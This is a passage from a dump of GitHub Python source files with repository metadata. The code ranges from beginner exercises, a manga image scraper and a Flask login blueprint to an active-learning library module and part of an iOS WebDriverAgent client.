range(len(boletim[1])):\n print(f'O aluno: \\033[32m{boletim[0][m]}\\033[m '\nf'teve às seguintes notas: \\033[32m{boletim[1][m]}\\033[m e \\033[32m{boletim[2][m]}\\033[m')\n print('-=' * 35 + '-')\n if m == 999:\n print('-=' * 35 + '-')\n break","repo_name":"arlendev/exercicios-python","sub_path":"desafios-curso-em-video/desafio_89.py","file_name":"desafio_89.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43215203049","text":"import urllib.request, urllib.parse, urllib.error\nimport re\n\ninp = input('Enter URL: ')\n\nif re.search('^http://', inp):\n inp = re.findall('^http://(\\S+)', inp)[0]\n\n\nif not re.search('\\S+\\.\\S+/\\S+', inp):\n print('Not a proper URL!')\n quit()\n\nhost = inp.split('/')[0]\ndoc = inp.split('/')[1:]\ndocument = str()\nfor i in doc:\n document = document + i\n\n\nfhand = urllib.request.urlopen('http://' + host + '/' + document)\n\ncounter = 0\nfor line in fhand:\n data = line.decode().strip()\n counter = counter + len(data)\n if counter <= 3000:\n print(data)\nprint(counter)\n","repo_name":"KyleOfCanada/py4e","sub_path":"ex_12/ex_12_03.py","file_name":"ex_12_03.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44095032204","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom abc import ABC, abstractmethod\nfrom typing import List, Tuple\nimport numpy as np\nfrom molalkit.models.random_forest.RandomForestClassifier import RFClassifier\nfrom molalkit.models.gaussian_process.GaussianProcessRegressor import GPRegressor\nfrom molalkit.al.selection_method import get_topn_idx\n\n\nclass BaseForgetter(ABC):\n def __init__(self, batch_size: int = 1, forget_size: int = 1, forget_cutoff: float = None):\n self.batch_size = batch_size\n self.forget_size = forget_size\n self.forget_cutoff = forget_cutoff\n\n @abstractmethod\n def __call__(self, **kwargs) -> Tuple[List[int], List[float]]:\n pass\n\n @property\n @abstractmethod\n def info(self) -> str:\n pass\n\n\nclass BaseRandomForgetter(BaseForgetter, ABC):\n \"\"\"Base Forgetter that uses random seed.\"\"\"\n def __init__(self, batch_size: int = 1, forget_size: int = 1, forget_cutoff: float = None, seed: int = 0):\n super().__init__(batch_size=batch_size, forget_size=forget_size, forget_cutoff=forget_cutoff)\n np.random.seed(seed)\n\n\nclass RandomForgetter(BaseRandomForgetter):\n def __call__(self, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], None]:\n assert batch_size < len(data)\n return np.random.choice(list(range(len(data))), batch_size, replace=False).tolist(), None\n\n @property\n def info(self) -> str:\n return 'RandomForgetter'\n\n\nclass FirstForgetter(BaseForgetter):\n def __call__(self, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], None]:\n assert batch_size < len(data)\n return list(range(batch_size)), None\n\n @property\n def info(self) -> str:\n return 'FirstForgetter'\n\n\nclass MinOOBUncertaintyForgetter(BaseRandomForgetter):\n def __call__(self, model: RFClassifier, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], List[float]]:\n assert batch_size < len(data)\n assert isinstance(model, RFClassifier)\n assert model.oob_score is True\n y_oob_proba = model.oob_decision_function_\n # uncertainty calculation, normalized into 0 to 1\n y_oob_uncertainty = (0.25 - np.var(y_oob_proba, axis=1)) * 4\n # select the top-n points with least uncertainty\n forgotten_idx = get_topn_idx(y_oob_uncertainty, n=batch_size, target='min')\n acquisition = y_oob_uncertainty[np.array(forgotten_idx)].tolist()\n return forgotten_idx, acquisition\n\n @property\n def info(self) -> str:\n return 'MinOOBUncertaintyForgetter'\n\n\nclass MaxOOBUncertaintyForgetter(BaseRandomForgetter):\n def __call__(self, model: RFClassifier, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], List[float]]:\n \"\"\" Forget the samples with the highest out-of-bag (OOB) uncertainty.\n\n Parameters\n ----------\n model: Only random forest classifier is supported due to efficient OOB uncertainty calculation.\n data: The dataset to forget.\n batch_size: The number of samples to forget.\n\n Returns\n -------\n The index of samples to forget.\n \"\"\"\n assert batch_size < len(data)\n assert isinstance(model, RFClassifier)\n y_oob_proba = model.oob_decision_function_\n # uncertainty calculation, normalized into 0 to 1\n y_oob_uncertainty = (0.25 - np.var(y_oob_proba, axis=1)) * 4\n # select the top-n points with least uncertainty\n forgotten_idx = get_topn_idx(y_oob_uncertainty, n=batch_size)\n acquisition = y_oob_uncertainty[np.array(forgotten_idx)].tolist()\n return forgotten_idx, acquisition\n\n @property\n def info(self) -> str:\n return 'MaxOOBUncertaintyForgetter'\n\n\nclass MinOOBErrorForgetter(BaseRandomForgetter):\n def __call__(self, model: RFClassifier, data, batch_size: int = 1, cutoff: float = None, **kwargs\n ) -> Tuple[List[int], List[float]]:\n assert batch_size < len(data)\n assert isinstance(model, RFClassifier)\n assert data.y.ndim == 2\n assert data.y.shape[1] == 1\n y_oob_proba = model.oob_decision_function_\n # uncertainty calculation, normalized into 0 to 1\n oob_error = np.absolute(y_oob_proba[:, 1] - data.y.ravel())\n # select the top-n points with least uncertainty\n forgotten_idx = get_topn_idx(oob_error, n=batch_size, target='min', cutoff=cutoff)\n acquisition = oob_error[np.array(forgotten_idx)].tolist() if forgotten_idx else []\n return forgotten_idx, acquisition\n\n @property\n def info(self) -> str:\n return 'MinOOBErrorForgetter'\n\n\nclass MinLOOErrorForgetter(BaseRandomForgetter):\n def __call__(self, model: GPRegressor, data, batch_size: int = 1, cutoff: float = None, **kwargs\n ) -> Tuple[List[int], List[float]]:\n \"\"\" Forget the samples with the lowest Leave-one-out cross-validation (LOOCV) error.\n Parameters\n ----------\n model: Only Gaussian process regressor is supported due to efficient LOOCV of GPR.\n data: The dataset to forget.\n batch_size: The number of samples to forget.\n cutoff: The cutoff value of LOOCV error. Only samples with LOOCV error lower than cutoff will be forgot.\n\n Returns\n -------\n The index and the acquisition value of samples to forget.\n \"\"\"\n assert batch_size < len(data)\n assert isinstance(model, GPRegressor)\n assert data.y.ndim == 2\n assert data.y.shape[1] == 1\n y_loocv = model.predict_loocv(data.X, data.y.ravel(), return_std=False)\n # uncertainty calculation, normalized into 0 to 1\n loo_error = np.absolute(y_loocv - data.y.ravel())\n # select the top-n points with least uncertainty\n forgotten_idx = get_topn_idx(loo_error, n=batch_size, target='min', cutoff=cutoff)\n acquisition = loo_error[np.array(forgotten_idx)].tolist() if forgotten_idx else []\n return forgotten_idx, acquisition\n\n @property\n def info(self) -> str:\n return 'MinLOOErrorForgetter'\n","repo_name":"RekerLab/MolALKit","sub_path":"molalkit/al/forgetter.py","file_name":"forgetter.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23161600065","text":"import click\n\nfrom .cleanup import cleanup\n\nout_info = lambda m: click.secho(str(m), fg='yellow')\nout_action = lambda m: click.secho(str(m), fg='red')\nout_done = lambda m: click.secho(str(m), fg='green')\n\n\n@click.command()\n@click.option(\"--token\", prompt=\"Github token\", help=\"The personal access token for GitHub\")\n@click.option(\"--owner\", prompt=\"Repository owner\", help=\"The owner of the repository.\")\n@click.option(\"--name\", prompt=\"Repository name\", help=\"The person to greet.\")\n@click.option(\"--all\", is_flag=True, help=\"Remove all packages. Otherwise keep last version of each package.\")\n@click.option(\"--delete-base\", is_flag=True, help=\"Remove also docker base layer(Dangerous!).\")\ndef clean(token: str, owner: str, name: str, all: bool, delete_base: bool):\n \"\"\"Removes all packages except current versions from Github.\"\"\"\n\n cleanup(token, owner, name, all, delete_base, out_info=out_info, out_action=out_action, out_done=out_done)\n\n\nif __name__ == '__main__':\n clean()\n","repo_name":"Kimaia/github-packages-cleaner","sub_path":"app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"26205864991","text":"# coding=utf-8\nimport threading\nimport serial\nimport time\nimport binascii\nclass myThread (threading.Thread): \n def __init__(self, threadID, name, port, baud,rootframe,filename):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.root = rootframe\n self.app = self.root.appFrame\n self.currenttab = 0\n self.thread_stop = True\n self.magneticdata = 0\n self.carstatus = 0\n self.port = port\n self.baud = baud\n\n\n self.filename = filename\n self.sensordata=[]\n self.count = 0\n self.update = threading.Thread(target = self.update)\n self.update.setDaemon(True)\n# self.update.start()\n \n def run(self):\n '''\n Parameter:\n \n Function:\n 接收串口数据,拆包,显示\n Autor:xiaoxiami 2015.5.29\n Others:线程 \n 当前数据格式:帧头 0x7D 5个16位传感器数值 高位在前 1个8位停车状态 1个16位斜率 高位在前 有符号型 帧尾0x7E \n '''\n self.count = 0\n self.app.identifyuartopen = 1\n while(1):\n if(self.thread_stop == True and self.uart.isOpen()==True):\n self.uart.read(self.uart.inWaiting())\n time.sleep(0.5)\n while(self.thread_stop == False and self.uart.isOpen()==True):\n self.currenttab = self.app.tab\n if self.currenttab == 3:\n buf = self.uart.read(1)\n if len(buf)!= 0:\n if ord(buf)==0x7D:\n # 不是采集5位需要改的\n buf+=self.uart.read(15)\n for v in buf:\n self.file = open(self.filename,\"a+\")\n self.file.write(binascii.b2a_hex(v)+\" \")\n self.file.close()\n # 不是采集5位需要改的 \n self.sensordata=[]\n self.sensordata.append(ord(buf[1])<<8|ord(buf[2]))\n self.sensordata.append(ord(buf[3])<<8|ord(buf[4]))\n self.sensordata.append(ord(buf[5])<<8|ord(buf[6]))\n self.sensordata.append(ord(buf[7])<<8|ord(buf[8]))\n self.sensordata.append(ord(buf[9])<<8|ord(buf[10]))\n self.app.Drawonce(count=self.count,value=self.sensordata)\n self.root.status.setdata('RX:%s ',self.sensordata) \n self.uart.read(self.uart.inWaiting())\n self.count+=5\n# time.sleep(0.5)\n #每次有5个新数据\n # 不是采集5位需要改的\n\n def update(self):\n while(1):\n if(self.sensordata != '' and self.count!=0):\n self.app.Drawonce(count=self.count,value=self.sensordata)\n self.root.status.setdata('RX:%s ',self.sensordata) \n time.sleep(0.2)\n\n def Creatuart(self):\n self.uart= serial.Serial()\n self.uart.port = self.port\n self.uart.baudrate = self.baud","repo_name":"skyman1991/Graduate-Project","sub_path":"Git_program/DebugPlatform-v3.0/DebugPlatform/identifythread.py","file_name":"identifythread.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"322719968","text":"from flask import Blueprint,request,session,redirect,url_for\nfrom models.item import Item\nfrom models.alert import Alert\nfrom models.stores import Stores\nfrom models.user import User \n\n\nfrom flask import render_template\nimport json\nusersBp=Blueprint('usersBp',__name__)\n\n@usersBp.route('/',methods=['POST','GET'])\ndef reg():\n if request.method == 'POST':\n n=request.form.get('name')\n p=request.form.get('pwd')\n\n try:\n r=User.reg(n,p)\n if not r:\n raise Exception\n session['n']=n\n except Exception as e:\n return 'user already exists'\n return session['n']\n\n return render_template('users/reg.html')\n \n\n\n\n@usersBp.route('/login',methods=['POST','GET'])\ndef login():\n if request.method == 'POST':\n n=request.form.get('name')\n p=request.form.get('pwd')\n\n try:\n if (User.validLogin(n,p)) :\n session['n']=n\n #return session['n']\n return redirect(url_for('alertBp.index'))\n else:\n return \"user data wrong\"\n except Exception as e:\n return \"user data invalid\"\n\n return render_template('users/login.html')\n \n\n@usersBp.route('/logout')\ndef logout():\n session['n']=None\n return \"loggedout\"","repo_name":"Shvejan/shopping-price-alerter","sub_path":"blueprints/usersBlueprint.py","file_name":"usersBlueprint.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12648832587","text":"import re\nfrom bs4 import BeautifulSoup\nimport requests\nimport sys, os, time\n\ndef get_chaps():\n headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'GET',\n 'Access-Control-Allow-Headers': 'Content-Type',\n 'Access-Control-Max-Age': '3600',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n };\n\n url = \"https://w3.mangaonepunch.com/\"\n req = requests.get(url, headers);\n soup = BeautifulSoup(req.content, \"html.parser\");\n\n # containers of all chapter's link\n container = soup.find(\"li\", {\"id\": \"ceo_latest_comics_widget-3\"});\n\n # List of all a tag within container\n ls_a_tags = container.find_all(\"a\");\n\n for a in ls_a_tags[::-1]:\n yield a.contents[0], a[\"href\"];\n\n\ndef get_chap_imgs(url):\n # sample\n headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'GET',\n 'Access-Control-Allow-Headers': 'Content-Type',\n 'Access-Control-Max-Age': '3600',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n };\n \n req = requests.get(url, headers);\n soup = BeautifulSoup(req.content, \"html.parser\");\n entry_inner = soup.find(\n \"div\",\n {\"class\":\"entry-inner\"});\n\n ls_pictures = entry_inner.find_all(\"picture\");\n\n out = [];\n for pic in ls_pictures:\n img = pic.find(\"img\");\n out.append( img[\"src\"] );\n\n return out;\n\ndef get_chap_imgs_v0(url):\n # sample\n headers = {\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'GET',\n 'Access-Control-Allow-Headers': 'Content-Type',\n 'Access-Control-Max-Age': '3600',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n };\n \n req = requests.get(url, headers);\n soup = BeautifulSoup(req.content, \"html.parser\");\n entry_inner = soup.find(\n \"div\",\n {\"class\":\"entry-inner\"});\n\n ls_pictures = entry_inner.find_all(\"img\");\n\n out = [];\n\n for pic in ls_pictures:\n out.append( pic[\"src\"] );\n\n return out;\n\n\n\ndef save_img(url, fn):\n with open(fn, \"wb\") as f:\n f.write(requests.get(url).content);\n\ndef parse_name(fn:str)->str:\n out = re.sub(r'\\s', '_', fn);\n return out.lower();\n\ndef get_fn_name(url):\n fn = url.split(\"/\")[-1];\n return fn.rjust(7, '0');\n\n\ndef crawl():\n chaps = get_chaps();\n\n for (chap_name, url) in chaps:\n print(f\"[+] Downloading chap {chap_name}, url = {url}\");\n\n\n fn_chap = parse_name(chap_name);\n os.mkdir(f\"data/{fn_chap}\");\n\n imgs = get_chap_imgs_v0(url);\n\n if len(imgs) == 0:\n imgs = get_chap_imgs(url);\n\n for img_url in imgs:\n fn_name = get_fn_name(img_url);\n fn_pth = f\"data/{fn_chap}/{fn_name}\"\n\n print(f\"[+] Saving {fn_pth}\");\n with open(fn_pth, \"wb\") as f:\n f.write(requests.get(img_url).content);\n time.sleep(2);\n","repo_name":"Young1906/opm","sub_path":"modules/soup.py","file_name":"soup.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7878967750","text":"import sys\n\n\n# Average salary ( highest and lowest salary excluded)\ndef average(self, salary: list[int]) -> float:\n highest = 0\n totalSum = 0\n lowest = sys.maxsize\n for s in salary:\n highest = max(s, highest)\n lowest = min(s, lowest)\n totalSum += s\n return (totalSum - lowest - highest) / (len(salary) - 2)\n\n\nprint(average(\"\", [1000, 2000, 3000]))\n","repo_name":"mmvergara/mmv-dsa","sub_path":"leetcode/explained/1419.py","file_name":"1419.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"30596286711","text":"import sys\n\nimport toml\nfrom setuptools import setup\n\ntry:\n from setuptools_rust import RustExtension\nexcept ImportError:\n import subprocess\n\n errno = subprocess.call([sys.executable, \"-m\", \"pip\", \"install\", \"setuptools-rust\"])\n if errno:\n print(\"Please install setuptools-rust package\")\n raise SystemExit(errno)\n else:\n from setuptools_rust import RustExtension\n\nwith open(\"Cargo.toml\") as fp:\n version = toml.load(fp)[\"package\"][\"version\"]\n\nsetup_requires = [\"setuptools-rust>=1.1.2\", \"wheel\"]\ninstall_requires = [\"toml~=0.10.2\"]\ntests_require = install_requires + [\"pytest\", \"pytest-benchmark\", \"mail-parser\"]\n\nsetup(\n name=\"fast_mail_parser\",\n version=version,\n packages=[\"fast_mail_parser\"],\n rust_extensions=[RustExtension(\"fast_mail_parser.fast_mail_parser\", debug=False)],\n install_requires=install_requires,\n tests_require=tests_require,\n setup_requires=setup_requires,\n include_package_data=True,\n zip_safe=False,\n)\n","repo_name":"namecheap/fast_mail_parser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"34"} +{"seq_id":"17210989197","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n############# 将给定的txt文件进行分词\n# cut(pathSource, pathDictionary, cutType, pathStore, storeType, fileFormat)\n# input parameter:\n# pathSource: 源文件路径,路径下为utf-8编码的多个txt文件\n# pathDictionary: 自定义词典路径\n# cutType:\n# single-分割结果不同的词只出现一次;\n# all-分割结果完整储存;\n# pathStore: 结果存储路径,one-路径+文件名;separate-路径;\n# storeType:\n# one-存储在一个文件中\n# separate-存储在多个文件中\n# fileFormat:\n# txt-支持storeType中的one和separate,存储格式为utf-8\n# csv-支持storeType中的one,存储格式为utf-8\n############## by k 2019/6/16\n\n\nimport re\nimport os\nimport jieba\nimport pandas as pd\n\n\ndef readTxtFile(filename, ec): # 系统默认gb2312, 大文件常用'UTF-8'\n str=\"\"\n with open(filename, 'r', encoding=ec) as f: # 设置文件对象\n str = f.read() # 可以是随便对文件的操作\n return(str)\n\n\ndef buildStopWordList(strStop):\n stopwords = set()\n strSplit = strStop.split('\\n')\n for line in strSplit:\n stopwords.add(line.strip())\n stopwords.add('\\n')\n stopwords.add('\\t')\n stopwords.add(' ')\n return stopwords\n\n\ndef readDir(szDir):\n lstFile = []\n for file in os.listdir(szDir):\n file_path = os.path.join(szDir, file)\n lstFile.append(file_path)\n return lstFile\n\n\ndef buildWordSet(str, setStop): #根据停用词过滤,并利用set去重\n # 过滤数字以及符号\n reg = \"[^A-Za-z\\u4e00-\\u9fa5]\"\n # 将分词、去停用词后的文本数据存储在list类型的texts中\n words = ' '.join(jieba.cut(str)).split(' ') # 利用jieba工具进行中文分词\n setStr = set()\n # 过滤停用词,只保留不属于停用词的词语\n for word in words:\n word = re.sub(reg, '', word)\n if word is not '':\n if word not in setStop:\n setStr.add(word)\n else:\n continue\n else:\n continue\n return setStr\n\n\ndef buildWordList(str, setStop): #根据停用词过滤\n reg = \"[^A-Za-z\\u4e00-\\u9fa5]\"\n # 将分词、去停用词后的文本数据存储在list类型的texts中\n words = ' '.join(jieba.cut(str)).split(' ') # 利用jieba工具进行中文分词\n setStr = []\n # 过滤停用词,只保留不属于停用词的词语\n for word in words:\n word = re.sub(reg, '', word)\n if word is not '':\n if word not in setStop:\n setStr.append(word)\n else:\n continue\n else:\n continue\n return setStr\n\n\ndef cut(pathSource, pathDictionary, cutType, pathStore, storeType, fileFormat):\n ################# 读取停用词列表\n encoding = 'UTF-8' # 默认统一编码\n strStop = readTxtFile(pathDictionary, encoding)\n setStop = buildStopWordList(strStop)\n\n ################# 读取一个文件夹中的的各个比较文档\n lstFile = readDir(pathSource)\n # 获取短文件名列表\n lstFileShow = []\n for szFilename in lstFile:\n lstShortFilename = re.search(r'[^\\\\/:*?\"<>|\\r\\n]+$', szFilename)\n lstMatch = re.findall(r'[^\\.]+', lstShortFilename[0]) # 短文件名 a 没有后缀 .b\n lstFileShow.append(lstMatch[0])\n # print(lstFileShow)\n\n ################# 根据分割需求进行分割\n lstDocContent = []\n for szFileName in lstFile:\n str = readTxtFile(szFileName, encoding) # encoding = 'UTF-8' for large files\n if cutType == 'single':\n str = buildWordSet(str, setStop)\n elif cutType == 'all':\n str = buildWordList(str, setStop)\n lstDocContent.append(str)\n\n # 根据存储要求进行分别存储\n if storeType == 'one':\n if fileFormat == 'csv':\n # 存储文档分词结果,利用pandas保存问csv文件\n dfWord = pd.DataFrame(data=lstDocContent, index=lstFileShow)\n dfWord.to_csv(pathStore, index=True, header=False, encoding=encoding)\n elif fileFormat == 'txt':\n print('not writing')\n elif storeType == 'separate':\n print('not writing')\n\n\n","repo_name":"Lucifer094/courseSimlarity","sub_path":"jiebaCut.py","file_name":"jiebaCut.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"28071353221","text":"# coding: utf-8\n\nimport atexit\nimport base64\nimport io\nimport json\nimport logging\nimport queue\nimport subprocess\nimport sys\nimport threading\nimport time\nimport typing\n\nimport requests\nfrom cached_property import cached_property\nfrom logzero import setup_logger\nfrom PIL import Image\n\nfrom ._alert import Alert\nfrom ._base import BaseClient\nfrom ._logger import logger\nfrom ._proto import *\nfrom ._types import *\nfrom .exceptions import *\nfrom .usbmux import requests_usbmux, usbmux\n\n\nclass HTTPResponse:\n def __init__(self, resp: requests.Response, err: requests.RequestException):\n self._resp = resp\n self._err = err\n\n def is_success(self) -> bool:\n return self._err is None and self._resp.status_code == 200\n\n def json(self) -> dict:\n assert self._resp is not None\n try:\n return self._resp.json()\n except json.JSONDecodeError:\n return RequestError(\"JSON decode error\", self._resp.text)\n\n def get_error_message(self) -> str:\n if self._resp:\n return self._resp.text\n return str(self._err)\n\n def raise_if_failed(self):\n if self._err:\n raise RequestError(\"HTTP request error\", self._err)\n if self._resp.status_code != 200:\n raise RequestError(self._resp.status_code, self._resp.text)\n\n\nclass CommonClient(BaseClient):\n def __init__(self, wda_url: str):\n super().__init__(wda_url)\n self.__ui_size = None\n self.__debug = False\n\n @property\n def debug(self) -> bool:\n return self.__debug\n\n @debug.setter\n def debug(self, v: bool):\n if v:\n setup_logger(NAME)\n else:\n setup_logger(NAME, level=logging.INFO)\n\n def app_start(self, bundle_id: str, arguments: typing.List[str] = [], environment: typing.Dict[str, str] = {}):\n self.session_request(POST, \"/wda/apps/launch\", {\n \"bundleId\": bundle_id,\n \"arguments\": arguments,\n \"environment\": environment,\n })\n\n def app_terminate(self, bundle_id: str):\n self.session_request(POST, \"/wda/apps/terminate\", {\n \"bundleId\": bundle_id\n })\n\n def app_state(self, bundle_id: str) -> AppState:\n value = self.session_request(POST, \"/wda/apps/state\", {\n \"bundleId\": bundle_id\n })[\"value\"]\n return AppState(value)\n\n def app_current(self) -> AppInfo:\n self.unlock()\n st = self.status()\n if st.session_id is None:\n self.session()\n data = self.request(GET, \"/wda/activeAppInfo\")\n value = data['value']\n return AppInfo.value_of(value)\n\n def app_list(self) -> AppList:\n value = self.session_request(GET, \"/wda/apps/list\")[\"value\"][0]\n return AppList.value_of(value)\n\n def deactivate(self, duration: float):\n self.session_request(POST, \"/wda/deactivateApp\", {\n \"duration\": duration\n })\n\n @cached_property\n def alert(self) -> Alert:\n return Alert(self)\n\n def sourcetree(self) -> SourceTree:\n data = self.request(GET, \"/source\")\n return SourceTree.value_of(data)\n\n def open_url(self, url: str):\n self.session_request(POST, \"/url\", {\n \"url\": url\n })\n\n def set_clipboard(self, content: str, content_type=\"plaintext\"):\n \"\"\" only works when WDA app is foreground \"\"\"\n self.session_request(POST, \"/wda/setPasteboard\",{\n \"content\": base64.b64encode(content.encode()).decode(),\n \"contentType\": content_type\n })\n \n def get_clipboard(self, content_type=\"plaintext\") -> str:\n data = self.session_request(POST, \"/wda/getPasteboard\",{\n \"contentType\": content_type\n })\n return base64.b64decode(data['value']).decode('utf-8')\n\n def appium_settings(self, kwargs: dict = None) -> dict:\n if kwargs is None:\n return self.session_request(GET, \"/appium/settings\")[\"value\"]\n payload = {\"settings\": kwargs}\n return self.session_request(POST, \"/appium/settings\", payload)[\"value\"]\n\n def is_locked(self) -> bool:\n return self.request(GET, \"/wda/locked\")[\"value\"]\n\n def unlock(self):\n self.request(POST, \"/wda/unlock\")\n\n def lock(self):\n self.request(POST, \"/wda/lock\")\n\n def homescreen(self):\n self.request(POST, \"/wda/homescreen\")\n\n def shutdown(self):\n self.request(GET, \"/wda/shutdown\")\n\n def get_orientation(self) -> Orientation:\n value = self.session_request(GET, '/orientation')['value']\n return Orientation(value)\n\n def window_size(self) -> typing.Tuple[int, int]:\n \"\"\"\n Returns:\n UISize\n \n Ref:\n FBElementCommands.m\n \"\"\"\n data = self.session_request(GET, \"/window/size\")\n return data['value']['width'], data['value']['height']\n \n # 代码暂时保留,下面的方法为通过截图获取屏幕大小\n # # 这里做了一点速度优化,跟进图像大小获取屏幕尺寸\n # orientation = self.get_orientation()\n # if self.__ui_size is None:\n # # 这里认为screenshot返回的屏幕转向时正确的\n # pixel_width, pixel_height = self.screenshot().size\n # w, h = pixel_width//self.scale, pixel_height//self.scale\n # if self.get_orientation() == Orientation.PORTRAIT:\n # self.__ui_size = (w, h)\n # else:\n # self.__ui_size = (h, w)\n\n # if orientation == Orientation.LANDSCAPE:\n # return self.__ui_size[::-1]\n # else:\n # return self.__ui_size\n\n def send_keys(self, value: str):\n \"\"\" input with some text \"\"\"\n self.session_request(POST, \"/wda/keys\", {\"value\": list(value)})\n\n def tap(self, x: int, y: int):\n self.session_request(POST, \"/wda/tap/0\", {\"x\": x, \"y\": y})\n \n def touch_and_hold(self, x: int, y: int, duration: float):\n \"\"\" touch and hold\n \n Ref:\n FBElementCommands.m\n \"\"\"\n self.session_request(POST, \"/wda/touchAndHold\", {\"x\": x, \"y\": y, \"duration\": duration})\n\n def swipe(self,\n from_x: int,\n from_y: int,\n to_x: int,\n to_y: int,\n duration: float = 0.5):\n payload = {\n \"fromX\": from_x,\n \"fromY\": from_y,\n \"toX\": to_x,\n \"toY\": to_y,\n \"duration\": duration}\n self.session_request(POST, \"/wda/dragfromtoforduration\", payload)\n\n def press(self, name: Keycode):\n payload = {\n \"name\": name\n }\n self.session_request(POST, \"/wda/pressButton\", payload)\n\n def press_duration(self, name: Keycode, duration: float):\n hid_usages = {\n \"home\": 0x40,\n \"volumeup\": 0xE9,\n \"volumedown\": 0xEA,\n \"power\": 0x30,\n \"snapshot\": 0x65,\n \"power_plus_home\": 0x65\n }\n name = name.lower()\n if name not in hid_usages:\n raise ValueError(\"Invalid name:\", name)\n hid_usages = hid_usages[name]\n payload = {\n \"page\": 0x0C,\n \"usage\": hid_usages,\n \"duration\": duration\n }\n return self.session_request(POST, \"/wda/performIoHidEvent\", payload)\n\n def volume_up(self):\n self.press(Keycode.VOLUME_UP)\n \n def volume_down(self):\n self.press(Keycode.VOLUME_DOWN)\n\n @cached_property\n def scale(self) -> int:\n # Response example\n # {\"statusBarSize\": {'width': 320, 'height': 20}, 'scale': 2}\n value = self.session_request(GET, \"/wda/screen\")['value']\n return value['scale']\n\n def status_barsize(self) -> StatusBarSize:\n # Response example\n # {\"statusBarSize\": {'width': 320, 'height': 20}, 'scale': 2}\n value = self.session_request(GET, \"/wda/screen\")['value']\n return StatusBarSize.value_of(value['statusBarSize'])\n\n def screenshot(self) -> Image.Image:\n \"\"\" take screenshot \"\"\"\n value = self.request(GET, \"/screenshot\")[\"value\"]\n raw_value = base64.b64decode(value)\n buf = io.BytesIO(raw_value)\n im = Image.open(buf)\n return im.convert(\"RGB\")\n\n def battery_info(self) -> BatteryInfo:\n data = self.session_request(GET, \"/wda/batteryInfo\")[\"value\"]\n return BatteryInfo.value_of(data)\n\n @property\n def info(self) -> DeviceInfo:\n return self.device_info()\n\n def device_info(self) -> DeviceInfo:\n data = self.session_request(GET, \"/wda/device/info\")[\"value\"]\n return DeviceInfo.value_of(data)\n \n def keyboard_dismiss(self, key_names: typing.List[str] = [\"前往\", \"发送\", \"Send\", \"Done\", \"Return\"]):\n \"\"\" dismiss keyboard\n 相当于通过点击键盘上的按钮来关闭键盘\n\n Args:\n key_names: list of keys to tap to dismiss keyboard\n \"\"\"\n self.session_request(POST, \"/wda/keyboard/dismiss\", {\"keyNames\": key_names})\n\n\nclass XCUITestRecover(Recover):\n def __init__(self, udid: str):\n self._udid = udid\n\n def recover(self) -> bool:\n \"\"\" launch by tidevice\n \n https://github.com/alibaba/tidevice\n \"\"\"\n logger.info(\"WDA is starting using tidevice ...\")\n args = [sys.executable, '-m', 'tidevice', '-u', self._udid, 'xctest']\n p = subprocess.Popen(args,\n stdin=subprocess.DEVNULL,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n start_new_session=True,\n close_fds=True, encoding=\"utf-8\")\n \n que = queue.Queue()\n threading.Thread(target=self.drain_process_output, args=(p, que), daemon=True).start()\n try:\n success = que.get(timeout=20)\n return success\n except queue.Empty:\n logger.warning(\"WDA launch timeout 20s\")\n p.kill()\n return False\n\n def drain_process_output(self, p: subprocess.Popen, msg_queue: queue.Queue):\n deadline = time.time() + 10\n lines = []\n while time.time() < deadline:\n if p.poll() is not None:\n logger.warning(\"xctest exited, output --.\\n %s\", \"\\n\".join(lines)) # p.stdout.read())\n msg_queue.put(False)\n return\n line = p.stdout.readline().strip()\n lines.append(line)\n # logger.info(\"%s\", line)\n if \"WebDriverAgent start successfully\" in line:\n logger.info(\"WDA started\")\n msg_queue.put(True)\n break\n \n atexit.register(p.terminate)\n while p.stdout.read() != \"\":\n pass\n\n\nclass AppiumClient(CommonClient):\n \"\"\"\n client for https://github.com/appium/WebDriverAgent\n \"\"\"\n\n def __init__(self, wda_url: str = DEFAULT_WDA_URL):\n super().__init__(wda_url)\n\n\nclass AppiumUSBClient(AppiumClient):\n def __init__(self, udid: str = None, port: int = 8100):\n if udid is None:\n _usbmux = 